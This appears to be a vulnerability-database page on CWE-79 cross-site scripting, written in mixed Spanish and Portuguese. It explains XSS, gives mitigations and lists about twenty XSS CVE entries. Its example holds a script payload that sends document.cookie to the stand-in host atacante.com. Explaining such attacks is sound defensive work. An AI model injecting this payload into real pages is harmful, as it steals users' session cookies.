Fallos del tipo CWE-79

29.250 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2026-57101HIGHVisual Studio Code Security Feature Bypass VulnerabilityEPSS 0.5%CVE-2024-13803MEDIUMEssential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates <= 5.2.3 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2023-5316CRITICALCross-site Scripting (XSS) - DOM in thorsten/phpmyfaqEPSS 0.5%CVE-2024-47947MEDIUMStored cross site scriptingEPSS 0.5%CVE-2022-46148HIGHDiscourse allows self-XSS through malicious composer messageEPSS 0.5%CVE-2023-2436MEDIUMBlog-in-Blog <= 2.0.0 - Authenticated (Editor+) Stored Cross-Site Scripting via ShortcodeEPSS 0.5%CVE-2023-31928MEDIUMXSS vulnerability in Brocade WebtoolsEPSS 0.5%CVE-2022-39279MEDIUMDiscourse-chat plugin susceptible to XSS in channel name and descriptionEPSS 0.5%CVE-2022-39270MEDIUMArbitrary HTML injection in table-of-contents theme component in DiscoTOCEPSS 0.5%CVE-2024-33670MEDIUMPassbolt API before 4.6.2 allows HTML injection in a URL parameter, resulting in custom content being displayed when a user visits the craftEPSS 0.5%CVE-2023-1869MEDIUMYourChannel <= 1.2.5 - Authenticated (Administrator+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2024-28680MEDIUMDedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/diy_add.php.EPSS 0.5%CVE-2023-4271MEDIUMPhotospace Responsive <= 2.1.1 - Authenticated (Administrator+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2026-27169HIGHOpenSift: Persistent XSS Chat Tool RenderingEPSS 0.5%CVE-2026-81899HIGHConcrete CMS 9.0 to 9.5.2 is vulnerable to Stored XSS via group folder name on the Members > Groups dashboardEPSS 0.5%CVE-2023-44389LOWZope management interface vulnerable to stored cross site scripting via the title propertyEPSS 0.5%CVE-2025-62694MEDIUMStored XSS through a system messageEPSS 0.5%CVE-2024-51377HIGHAn issue in Ladybird Web Solution Faveo Helpdesk & Servicedesk (On-Premise and Cloud) 9.2.0 allows a remote attacker to execute arbitrary coEPSS 0.5%CVE-2026-85129HIGHHoo Companion 1.0.2 - Unauthenticated Stored XSS via Theme Settings ImportEPSS 0.5%CVE-2024-0442MEDIUMRoyal Elementor Addons and Templates <= 1.3.87 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.5%